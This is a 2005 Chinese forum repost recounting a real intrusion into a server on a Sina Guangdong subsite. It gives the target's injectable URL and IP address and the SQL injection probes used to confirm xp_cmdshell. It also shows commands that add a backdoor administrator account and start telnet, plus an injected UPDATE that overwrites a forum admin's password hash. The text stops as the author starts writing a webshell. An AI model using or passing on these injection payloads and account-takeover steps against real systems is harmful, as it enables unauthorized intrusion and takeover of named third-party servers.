标题: [转帖]实战入侵新浪分站的一台服务器 [打印本页]

---

作者: Jesse    时间: 2005-6-4 17:53     标题: [转帖]实战入侵新浪分站的一台服务器

前段时间听说sohu的一个分站被人黑了我还看了，是真的。所以我也对这种门户网站动动手，我上了www.sina.com.cn, 又跑到了它的广东分站。东西太多了，找个注入点也很难，大多是html,shtml的页面。于是我查看源文件，搜索asp. 总算找到了一个可以asp的页面，找到了一个注入点http://gzguide.gd.sina.com.cn/news/newdetail.asp?id=2807 提交单引号， Microsoft OLE DB Provider for ODBC Drivers 错误 ';80040e14'; [Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ';'; 之前有未闭合的引号。 /news/newdetail.asp，行 5 提交 and 1＝1 返回正常，提交and 1＝2 出错。呵呵，典型的注入漏洞。 and 1=(select%20@@VERSION) 返回结果表明是sql2000的，windows2000的服务器 and ';SA';=(SELECT%20System_user)，返回错误，看来不是sa帐号连接 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = ';X'; AND name = ';xp_cmdshell';) 返回正常，表明xp_cmdshell存在 手工注入太麻烦，用nbsi吧，想到nbsi老发生意外出错，用教主的HDSI吧，它还支持php注入呢！结果出来了，显示连接帐号为dbo,SA权限，这下好了。因为权限比较高，所以用HDSI能够直接执行系统命令，省得在浏览器里面用xp_cmdshell执行。 如图01执行ipcongfig －all命令，看了一下ip，确定sql数据库和网站是在同一台机子上。用net start命令看了一下， 有诺顿，serv-u，sql，终端服务也开了。先加个帐户。 net user zuoai /add, net localgroup administrator zuoai /add 再执行net start telnet. 先连它的终端试试，这个我只抱着40％的希望。可喜的是能连上去，可是当我输入 帐号和密码后出现如下提示框。 图1 guest$虽然是管理员权限，却没有远程登陆的权限。 再试试telnet，这个我只抱着20％的希望，果然，出现“正在连接到211.155.23.118...无法打开到主机的连接 在端口 23 : 连接失败”，这种错误很常见，可能是由于telnet服务没有成功开启或者_blank">防火墙屏 蔽了对23端口的访问，这里应该属于前面一种情况！那就试试ipc连接吧， ，发生错误53，这种错误一般是自己的lanmanworkstation服务未启动或者目标删除了ipc$，这里应该属于前面一种情况。 现在我关键是把木马传上去，怎么办呢？得到webshell，再上传图片，得到webshell。 用HDSI把所有的表都猜出来了，实在太多了，根本找不到管理员密码在哪个表里面。于是跨库查询，看到了一个bbs库，一个leadbbs2的库。 我立刻访问http://gzguide.gd.sina.com.cn/bbs，果然是个论坛，估计是他们自己开发的(后来才知道是leadbbs). 我接着猜解bbs这个库，希望把管理员密码帐号都跑出来。希望不是md5加密的，如果用md5加密了的话就只好用updata把密码改为自己的了. 再用HDSI猜后台地址，很快猜出来了，http://gzguide.gd.sina.com.cn/bbs/manage/default.asp 可是着个库里面还是没有重要东西。这个bbs应该对那个leadbbs2库，密码跑出来了,是md5加密的。 如图02 ;update leadbbs2.dbo.leadbbs_User set pass=';4621d373cade4e83'; where username=';admin';;--,4621d373cade4e83是md5加密后的test.应试试帐号:admin,密码:test登陆却出现提示"此用户已经开启IP绑定访问，您无权使用此用户!".一阵狂晕，管理员登陆限制了ip！看来用这种办法得到webshell是不行了。 其实现在可以先找到web的绝对路径后在HDSI中用echo写个小马上去，可是用echo的时候有写字符要用"^"来转义，比如写个冰狐浪子服务端要这样写 echo ^